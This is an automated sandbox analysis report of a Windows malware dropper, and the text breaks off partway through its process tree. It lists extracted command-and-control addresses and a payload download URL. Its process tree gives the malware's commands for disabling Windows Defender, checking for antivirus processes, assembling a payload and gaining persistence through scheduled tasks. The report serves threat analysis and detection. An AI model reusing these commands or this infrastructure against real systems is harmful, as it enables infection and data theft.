Analysis
-
max time kernel
133s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-12-2024 03:17
Static task
static1
Behavioral task
behavioral1
Sample
ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe
Resource
win7-20240903-en
General
-
Target
ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe
-
Size
1.8MB
-
MD5
f25ddb78a2cc3b6442c52a3c4a2aa843
-
SHA1
52ba6df84b158bf917044fee22625d2a12202382
-
SHA256
ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4
-
SHA512
74c7900f42e3d9b5d490e4848c7d12832f14b245065e04baa96604f2ca91ea5e46318ea71e081ee266fc770a94413edc298516abf23ed9f6c7cd6e7a70b72f14
-
SSDEEP
49152:pe5qRAcBzaCfib5MCfsPC7gRfNPDCrB6t:pe5GAmzlc59fsRtCst
Malware Config
Extracted
https://exodus.lat/COMSurrogate.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
gcleaner
92.63.197.221
45.91.200.135
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://atten-supporse.biz/api
Extracted
orcus
45.74.38.211:4782
7a9c0f279c464958aebbd585f20f1cf2
-
autostart_method
Disable
-
enable_keylogger
false
-
install_path
%programfiles%\Orcus\Orcus.exe
-
reconnect_delay
10000
-
registry_keyname
Orcus
-
taskscheduler_taskname
Orcus
-
watchdog_path
AppData\OrcusWatchdog.exe
Extracted
lumma
https://atten-supporse.biz/api
https://se-blurry.biz/api
https://zinc-sneark.biz/api
https://dwell-exclaim.biz/api
https://formy-spill.biz/api
https://covery-mover.biz/api
https://dare-curbys.biz/api
https://print-vexer.biz/api
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 8f8b7f7520.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 8f8b7f7520.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 8f8b7f7520.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 8f8b7f7520.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 8f8b7f7520.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 8f8b7f7520.exe -
Orcus family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3664 created 3464 3664 Dr.com 56 -
TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
-
Ta505 family
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001e761-3756.dat family_xmrig behavioral2/files/0x000400000001e761-3756.dat xmrig -
Xmrig family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d9c5b97a2f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 628cb6a5aa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 91f0bbb4f8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8f8b7f7520.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Orcurs Rat Executable 1 IoCs
resource yara_rule behavioral2/memory/6032-3511-0x0000000001160000-0x0000000001564000-memory.dmp orcus -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 3828 powershell.exe 5500 powershell.exe 6140 powershell.exe 2740 powershell.exe 2448 powershell.exe 5492 powershell.exe 5500 powershell.exe 3828 powershell.exe 4896 powershell.exe 5900 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d9c5b97a2f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 91f0bbb4f8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8f8b7f7520.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8f8b7f7520.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d9c5b97a2f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 628cb6a5aa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 628cb6a5aa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 91f0bbb4f8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation wL3EGdM.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation RegAsm.exe -
Executes dropped EXE 12 IoCs
pid Process 4924 skotes.exe 2940 wL3EGdM.exe 3956 d9c5b97a2f.exe 1056 628cb6a5aa.exe 4976 91f0bbb4f8.exe 3664 Dr.com 3836 b9edc67fa3.exe 4880 skotes.exe 3196 8f8b7f7520.exe 5540 skotes.exe 6032 RegAsm.exe 5248 smartscreen.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine d9c5b97a2f.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine 628cb6a5aa.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine 91f0bbb4f8.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine 8f8b7f7520.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine skotes.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 8f8b7f7520.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8f8b7f7520.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\628cb6a5aa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012590001\\628cb6a5aa.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\91f0bbb4f8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012591001\\91f0bbb4f8.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9edc67fa3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012592001\\b9edc67fa3.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8f8b7f7520.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012593001\\8f8b7f7520.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" smartscreen.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 222 api.ipify.org 223 api.ipify.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023c24-459.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 4648 tasklist.exe 2824 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 1056 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe 4924 skotes.exe 3956 d9c5b97a2f.exe 1056 628cb6a5aa.exe 4976 91f0bbb4f8.exe 4880 skotes.exe 3196 8f8b7f7520.exe 5540 skotes.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe File opened for modification C:\Windows\MovieArchives wL3EGdM.exe File opened for modification C:\Windows\PackageExpression wL3EGdM.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 38 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language b9edc67fa3.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage b9edc67fa3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8f8b7f7520.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d9c5b97a2f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b9edc67fa3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dr.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 91f0bbb4f8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 628cb6a5aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wL3EGdM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 1476 taskkill.exe 1360 taskkill.exe 4976 taskkill.exe 4740 taskkill.exe 3240 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings firefox.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 644 schtasks.exe 1240 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1056 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe 1056 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe 4924 skotes.exe 4924 skotes.exe 3956 d9c5b97a2f.exe 3956 d9c5b97a2f.exe 1056 628cb6a5aa.exe 1056 628cb6a5aa.exe 4976 91f0bbb4f8.exe 4976 91f0bbb4f8.exe 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 4880 skotes.exe 4880 skotes.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3196 8f8b7f7520.exe 3196 8f8b7f7520.exe 3196 8f8b7f7520.exe 3196 8f8b7f7520.exe 3196 8f8b7f7520.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 5540 skotes.exe 5540 skotes.exe 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 6032 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 4648 tasklist.exe Token: SeDebugPrivilege 2824 tasklist.exe Token: SeDebugPrivilege 4740 taskkill.exe Token: SeDebugPrivilege 3240 taskkill.exe Token: SeDebugPrivilege 1476 taskkill.exe Token: SeDebugPrivilege 1360 taskkill.exe Token: SeDebugPrivilege 4976 taskkill.exe Token: SeDebugPrivilege 3196 8f8b7f7520.exe Token: SeDebugPrivilege 3052 firefox.exe Token: SeDebugPrivilege 3052 firefox.exe Token: SeDebugPrivilege 6032 RegAsm.exe Token: SeDebugPrivilege 3828 powershell.exe Token: SeDebugPrivilege 5900 powershell.exe Token: SeDebugPrivilege 5500 powershell.exe -
Suspicious use of FindShellTrayWindow 40 IoCs
pid Process 1056 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3836 b9edc67fa3.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe -
Suspicious use of SendNotifyMessage 38 IoCs
pid Process 3664 Dr.com 3664 Dr.com 3664 Dr.com 3664 Dr.com 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3836 b9edc67fa3.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3052 firefox.exe 3836 b9edc67fa3.exe 3836 b9edc67fa3.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3052 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1056 wrote to memory of 4924 1056 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe 82 PID 1056 wrote to memory of 4924 1056 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe 82 PID 1056 wrote to memory of 4924 1056 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe 82 PID 4924 wrote to memory of 2940 4924 skotes.exe 88 PID 4924 wrote to memory of 2940 4924 skotes.exe 88 PID 4924 wrote to memory of 2940 4924 skotes.exe 88 PID 2940 wrote to memory of 1900 2940 wL3EGdM.exe 91 PID 2940 wrote to memory of 1900 2940 wL3EGdM.exe 91 PID 2940 wrote to memory of 1900 2940 wL3EGdM.exe 91 PID 4924 wrote to memory of 3956 4924 skotes.exe 93 PID 4924 wrote to memory of 3956 4924 skotes.exe 93 PID 4924 wrote to memory of 3956 4924 skotes.exe 93 PID 4924 wrote to memory of 1056 4924 skotes.exe 94 PID 4924 wrote to memory of 1056 4924 skotes.exe 94 PID 4924 wrote to memory of 1056 4924 skotes.exe 94 PID 1900 wrote to memory of 4648 1900 cmd.exe 95 PID 1900 wrote to memory of 4648 1900 cmd.exe 95 PID 1900 wrote to memory of 4648 1900 cmd.exe 95 PID 1900 wrote to memory of 1852 1900 cmd.exe 96 PID 1900 wrote to memory of 1852 1900 cmd.exe 96 PID 1900 wrote to memory of 1852 1900 cmd.exe 96 PID 1900 wrote to memory of 2824 1900 cmd.exe 97 PID 1900 wrote to memory of 2824 1900 cmd.exe 97 PID 1900 wrote to memory of 2824 1900 cmd.exe 97 PID 1900 wrote to memory of 1704 1900 cmd.exe 98 PID 1900 wrote to memory of 1704 1900 cmd.exe 98 PID 1900 wrote to memory of 1704 1900 cmd.exe 98 PID 1900 wrote to memory of 4528 1900 cmd.exe 99 PID 1900 wrote to memory of 4528 1900 cmd.exe 99 PID 1900 wrote to memory of 4528 1900 cmd.exe 99 PID 1900 wrote to memory of 2204 1900 cmd.exe 100 PID 1900 wrote to memory of 2204 1900 cmd.exe 100 PID 1900 wrote to memory of 2204 1900 cmd.exe 100 PID 4924 wrote to memory of 4976 4924 skotes.exe 101 PID 4924 wrote to memory of 4976 4924 skotes.exe 101 PID 4924 wrote to memory of 4976 4924 skotes.exe 101 PID 1900 wrote to memory of 3664 1900 cmd.exe 102 PID 1900 wrote to memory of 3664 1900 cmd.exe 102 PID 1900 wrote to memory of 3664 1900 cmd.exe 102 PID 1900 wrote to memory of 3128 1900 cmd.exe 103 PID 1900 wrote to memory of 3128 1900 cmd.exe 103 PID 1900 wrote to memory of 3128 1900 cmd.exe 103 PID 4924 wrote to memory of 3836 4924 skotes.exe 105 PID 4924 wrote to memory of 3836 4924 skotes.exe 105 PID 4924 wrote to memory of 3836 4924 skotes.exe 105 PID 3664 wrote to memory of 1196 3664 Dr.com 106 PID 3664 wrote to memory of 1196 3664 Dr.com 106 PID 3664 wrote to memory of 1196 3664 Dr.com 106 PID 1196 wrote to memory of 644 1196 cmd.exe 108 PID 1196 wrote to memory of 644 1196 cmd.exe 108 PID 1196 wrote to memory of 644 1196 cmd.exe 108 PID 3664 wrote to memory of 1240 3664 Dr.com 109 PID 3664 wrote to memory of 1240 3664 Dr.com 109 PID 3664 wrote to memory of 1240 3664 Dr.com 109 PID 3836 wrote to memory of 4740 3836 b9edc67fa3.exe 111 PID 3836 wrote to memory of 4740 3836 b9edc67fa3.exe 111 PID 3836 wrote to memory of 4740 3836 b9edc67fa3.exe 111 PID 3836 wrote to memory of 3240 3836 b9edc67fa3.exe 116 PID 3836 wrote to memory of 3240 3836 b9edc67fa3.exe 116 PID 3836 wrote to memory of 3240 3836 b9edc67fa3.exe 116 PID 4924 wrote to memory of 3196 4924 skotes.exe 115 PID 4924 wrote to memory of 3196 4924 skotes.exe 115 PID 4924 wrote to memory of 3196 4924 skotes.exe 115 PID 3836 wrote to memory of 1476 3836 b9edc67fa3.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3464
-
C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe"C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"6⤵
- System Location Discovery: System Language Discovery
PID:1852
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
PID:1704
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4915056⤵
- System Location Discovery: System Language Discovery
PID:4528
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B6⤵
- System Location Discovery: System Language Discovery
PID:2204
-
-
C:\Users\Admin\AppData\Local\Temp\491505\Dr.comDr.com B6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST7⤵
